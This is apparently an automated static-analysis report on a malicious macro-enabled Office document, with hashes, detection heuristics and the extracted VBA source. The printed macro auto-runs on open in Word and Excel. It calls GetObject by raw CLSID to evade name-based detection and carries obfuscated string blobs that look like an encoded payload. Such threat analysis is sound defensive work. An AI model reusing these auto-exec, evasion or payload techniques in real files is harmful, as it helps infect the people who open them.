Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4f30ee61af69027…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 19.2 KB
Created: 2021-10-18 14:22:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-10-24
MD5: 0b70546b28da5c1ad2bc4a52a6b0c283
SHA-1: 3b2117fb8c4ae60ee931dca1d15dce002abd7f36
SHA-256: a4f30ee61af69027b7dd73603b8c37cac142a1e2a509ded8934450c3e0d3fe30
Risk Score: 296

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1219 Remote Access Software

The sample is an OOXML document whose VBA project defines four auto-execution entry points (AutoOpen, Document_Open, Auto_Open, Workbook_Open), covering both Word and Excel. Each entry point calls the same private routine, helloWord, which invokes GetObject with a raw CLSID ({c08afd90-f2a1-11d1-8455-00a0c91f3880}) rather than a ProgID, a known technique for executing arbitrary code or downloading secondary payloads while evading name-based macro detection. helloWord also concatenates the string 'hell' from single characters but never uses it, and the module carries four private string functions (favourite, examination, cat, secretary) that return long obfuscated blobs no code path references. The combination of auto-executing macros and the GetObject-by-CLSID call strongly suggests a downloader or initial execution vector for further malicious activity.

Heuristics (11)

  • ClamAV: Doc.Downloader.Generic-6698421-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML (severity: medium, 7 related findings, rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    Private Sub helloWord()
        Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  • VBA instantiates a COM class by raw CLSID (severity: high, rule: OLE_VBA_GETOBJECT_CLSID_EVASION)
    VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
    Matched line in script:
    Private Sub helloWord()
        Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
        ' Becomes launched as first on MS Word
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Sub Document_Open()
        ' Becomes launched as second, another try, on MS Word
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()
        ' Becomes launched as second, another try, on MS Excel
  • Auto_Open macro (severity: low, rule: OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script:
    Sub Auto_Open()
        ' Becomes launched as first on MS Excel
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs extracted from this sample were found in the document text (OOXML body / shared strings) and are standard Office XML schema namespace identifiers.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1811 bytes
SHA-256: d8c17a92dcac6f092f21e1389a5a1190190656152b2245a42233de269fed056c

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public alreadyLaunched As Integer

Private Function favourite() As String
    favourite = "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99LQBV9 FI9SQ9g9 Gg9d9B0 9H99cw969C 89LwBi9G k9d99u9Gw9eQ9 v9DM9awBL9  GI9Ug92 9HM9I99t9E89I9  BD9Do"
End Function

Private Function examination() As String
    examination = "9X9 BV9HM9ZQBy9 HM9X9BH9EI9 TwBZ9EU 9UgBc9 EE9c9Bw9EQ 9YQB09GE9X9 BM9G89Yw Bh9Gw9X9 BU9GU9bQB w9Fw9 dwBl9GI9a9 Bv9HM9d9 9u9GU9e9B l9Ds9  UwB09GE 9cgB09C"
End Function

Private Function cat() As String
    cat = "09U9B y9G89YwB l9HM9cw9g9 C09Rg9g9EM 9OgBc9FU 9cwBl9HI 9cwBc 9Ec9Qg BP9Fk 9RQBS9 Fw9QQBw9H9 9R9Bh 9HQ9Y  QBc9Ew9bw Bj9GE9b9Bc9FQ 9ZQBt9H99 X9B39 GU9YgBo9"
End Function

Private Function secretary() As String
    secretary = "G89cw B09C49ZQB 49GU9I 99t9EE9 I99n9C09Z Q9g9GM9 bQBk9C99OQ 9x9C49 MQ9y9DE9 Lg9x9Dc9Nw9u9DI  9M9909C99O99 w9Dg9M99 n9C99 LQB39Gk9I 9Bo9Ds9"
End Function


Private Sub helloWord()
    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    
    Dim fjiorr
    fjiorr = "h" & "e" & "l" & "l"


End Sub



Sub AutoOpen()
    ' Becomes launched as first on MS Word
    helloWord
End Sub

Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word
    helloWord
End Sub

Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    helloWord
End Sub

Sub Workbook_Open()
    ' Becomes launched as second, another try, on MS Excel
    helloWord
End Sub

Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes
SHA-256: 28e42e9f63a2076eefede5de3608e3953fc13167a599c17b9b8d08e182947311
Detection: ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).